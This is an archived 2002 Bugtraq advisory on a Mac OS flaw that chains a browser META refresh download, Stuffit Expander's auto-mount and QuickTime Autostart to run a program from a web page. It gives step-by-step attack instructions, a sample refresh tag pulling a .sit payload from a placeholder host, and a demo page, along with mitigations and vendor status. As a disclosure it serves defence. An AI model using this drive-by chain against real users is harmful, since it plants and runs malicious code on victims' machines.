Home page logo
/

bugtraq logo Bugtraq mailing list archives

Auto file execution vulnerability in Mac OS
From: vm_converter <vm_converter () mac com>
Date: Wed, 27 Feb 2002 18:31:24 +0900

Auto file execution vulnerability in Mac OS
<http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html>

[Overview]
We found a vulnerability in Mac OS and Mac OS X with Classic
Environment.
If victims only browse malicious web-page;

1.Browsers start automatically download a compressed disc-image file
  which includes malicious program.
2.Archivers --such like Stuffit Expander-- automatically expand the
  compressed file, and mount the disc-image.
3.Mac OS (QuickTime) executes the malicious program included in the
  disc-image. It depends on QuickTime settings.

These 3 processes are done full-automatically, and end in an instant.

[Detail]
The vulnerability which we found is based on 3 vulnerabilities, and
is generated by many software's complex relations.
To explain the vulnerability, we summarize these 3 vulnerabilities in
below.
----------------------------------------------------------------------
  --Vuln.1 (already announced at Bugtraq)
  "Macinosh IE file execuion vulerability" [BugTraq] 2002 Jan.22
   from Jass Seljamaa

   He reports the vulnerable systems are "IE 5.0, probably earlier, on
   Classic systems(below OS X)" in this contribute, however, the
   vulnerable system which we found are;
    --Microsoft Internet Explorer 5.0 through 5.1.3
    --iCab Pre 2.7 and 2.7.1

  This means, malicious users can execute local programs in Macintosh
  using web pages. But it's able to only execute programs exist in
  full file-path in Macintosh which known by a malicious users.
----------------------------------------------------------------------
  --Vuln.2 (probably announced in Japan only)
  Next day to Vuln.1 is reported, a Japanese user, Mr. Mori presents
  other vulnerability related to Vuln.1 at "Security Hole memo".
<http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie>
 (written in Japanese)

   This vulnerability, similar to Vuln.1, is observed when the web
   pages in which META-tag mentioned below is used are browsed.

  <META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/
   some.sit">

  Ater these pages are browsed, malicious programs are downloaded
  automatically.
  So, malicious users use combination of Vuln. 1 and Vuln. 2 can
  force victims to download the program and execute it.
  But, to force to execute the program, the malicious users must
  know the full file-path of download folders in victims' Macintosh.

    vulnerable browsers (in our test) :
        Microsoft Internet Explorer 4.5 through 5.1.3
        Netscape Communicator 4.78
        Netscape 6.2*1
        Mozilla 0.9.7*1
        iCab Pre 2.7 and 2.7.1
        Opera 5.0
        OmniWeb 4.0.6 and 4.1beta11
       *1: Netscape 6.2 and Mozilla shows dialog before download.
----------------------------------------------------------------------
  --Vuln. 3 (we found, probably announced in Japan only)
  According to Vuln.1 and 2, we found other vulnerability, malicious
  users can launch arbitrary programs without to know full file-path.

    Step 1 : Make a disk image that contains malicious program.
    Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin
             also effective)
    Step 3 : Upload this *.sit file to some website and prepare a web
             page using Vuln.1 and 2
    Step 4 : Victims browse the web page the *.sit file is downloaded
             automatically.*
    Step 5 : Stuffit Expander automatically extracts the *.sit file and
             mounts the disk image.
    Step 6 : The malicious program in the disk image is executed
             automatically by browsers.*
    *Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.

  Because of using disk image, malicious users are free to file-path of
  download folder. It's necessary to only prepare malicious programs
  and web pages.
  In this vulnerability, Stuffit Expander plays an important role. It
  does automatic extraction and auto-mount disk images. So, in consists
  of Vuln.1, browsers execute the program.

    vulnerable systems (in our test) :
        Stuffit Expander 5.x through 6.5.1 for Mac OS
        Stuffit Expander 6.5 or higher version for Mac OS X*1
        Microsoft Internet Explorer 5.0 through 5.1.3
        iCab Pre 2.7 and 2.7.1
        *1: Stuffit Expander 6.0 for X is not affected.

We make a test page for this vulnerability. Please try it.
http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/

----------------------------------------------------------------------
Auto file execution vulnerability in Mac OS
----------------------------------------------------------------------

According to Vuln.1 to Vuln.3, we explain the "Auto file execution
vulnerability in Mac OS".
This vulnerability which we found uses Vuln.2 and 3 but Vuln.1.
It is coused by many software's complex relations, such as browsers
(and network-clients) and Stuffit Expander and QuickTime. It's like
the computer-virus "AutoStart9805" using "Autostart CD-ROMs" of
QuickTime. In this way, similar to Vuln.3, malicious users can launch
arbitrary programs without to know full file-path.

  Step 1 : Make a disk image that contains "autostart" malicious
           program.
  Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin
           also effective)
  Step 3 : Upload this *.sit file to some website and prepare a web
           page using Vuln. 2.
  Step 4 and 5 is same as Vuln. 3.
  Step 6 : The program in the image is executed automatically by
           "Autostart CD-ROMs" of QuickTime.

In this vulnerability,
  1. browser downloads the *.sit in consists of Vuln.2.
  2. then, Stuffit Expander does automatic extraction and auto-mount the
     disk image.
  3. and then, QuickTime executes the program in the image.
These are initial settings of each one. It's a teamwork. Only needs one
click in web page, It will start automatic download, extraction,
mounting, and execution.
Furthermore, if victims manually download malicious disk image with
browsers or other network clients (like Fetch via FTP), automatic
extraction, mounting, execution will start.

  vulnerable systems :
     MacOS 9.x, and Mac OS X with Classic environment*1
     (probably System 7.5.x or higher)
     Quick Time 2.0 or higher version (probably)*2
     Stuffit Expander 5.x or higher version for Mac OS
     Stuffit Expande 6.5 or higher versionr for Mac OS X*3
     All browser and network-client using Stuffit Expander in
     post-process for download*4
     *1: using Mac OS X by oneself is not affected.
     *2: "Autostart CD-ROMs" is supported since QuickTime 2.0.
     *3: Stuffit Expander 6.0 for X is not affected.
     *4: Netscape 6.x and Mozilla shows dialog before download.
     *4: OmniWeb 4.1beta11 is vulnerable, but 4.0.6 is not.
     *4: We've tested Fetch 3.0.3, NetFinder v2.3.1, Vicomsoft FTP
           Client 3.0.1. These are vulnerable.

[Exploit]
We make a test page for this vulnerability. Please try it.
<http://www.u-struct.com/diary/img/20020131_OSissue_E/>

When your conditions are fulfilled, "Exploit_HD_OSX.img.sit" is
downloaded and extracted, and disk image "Exploit_HD_OSX" is mounted,
and application "openTrash" is launched automatically.
"openTrash" is application that prompt "This application opens trash
only" and open trash only.

[Solutions]
Change the initial settings of each ones below.

In Mac OS :
++required settings
  - "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off.
  - Stuffit Expander > preferences > Disk images > "Mount Disk Images"
     > turn off.
  - Change the initial Volume name (ex. Macintosh HD) to other.
  - Change the initial "Download Folder" (ex. Desktop Folder) of
    browsers to other.
++more secure settings (not required)
  - Stuffit Expander > preferences > Expanding > "Continue to expand"
     > turn off.
  - Each Browsers and network-clients > each preference > change
    download setting using Stuffit Expander in post-process to "save
    to file"
  - Each Browsers > each preference > change download settings to
    "disable" *
   * such as in Internet Explorer, set the "Security Zones" to "high"
      or "custom" (File downloads to "Disable").

In Mac OS X with Classic environment :
 - Classic's "QuickTime setting" control panel > "Autostart CD-ROMs"
   > turn off.*
 - Others are same as in Mac OS.
  * "Autostart CD-ROMs" is influenced with Classic's "QuickTime
      setting". So, when Classic environment is not booted, Mac OS X is
      not affected.

Please refer to the following URL about more detailed solutions.
<http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html>

[vendor status]
- mozilla.org (Bugzilla)
  They set our report as "security sensitive".
<http://bugzilla.mozilla.org/show_bug.cgi?id=123152>

- icab.de
  A Japanese iCab user (not us) has already reports to icab.de already.
  They reply for solutions, and have expressed correspondence.
  (But there is no infomation about it in their web site now.)

- microsoft.com and microsoft.co.jp
  They have expressed correspondence to Vuln.1
  (But there is no infomation about it in their web site now.)

- other vendors
  no reply or auto reply
----------------------------------------------------------------------
[comment]
We've reported to related vendors* at Feb.3, and contribute
this vulnerability to BugTraq regardless of vendor correspondence.
Because we already announce this vulnerability in Japan, at our
web-site and "Security Hole memo ML".
Probably, thousands of Japanese users already know this vulnerability.

(these are in Japanese Language)
<http://www.u-struct.com/diary/view.cgi?ID=s20020128002516>
<http://homepage.mac.com/vm_converter/200202_diary.html#20020128_AutoStart_vuln>
<http://memo.st.ryukoku.ac.jp/archive/200202.month/2846.html>

*:apple.com, apple.co.jp, microsoft.com, microsoft.co.jp,
aladdinsys.com, act2.co.jp, netscape.com, netscape.co.jp,
mozilla.org (Bugzilla), icab.de, omnigroup.com, opera.com.

[credit]

vm_converter <vm_converter () mac com>
FUJII Taiyo <taiyo () vinet or jp>


  By Date           By Thread  

Current thread:
  • Auto file execution vulnerability in Mac OS vm_converter (Feb 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault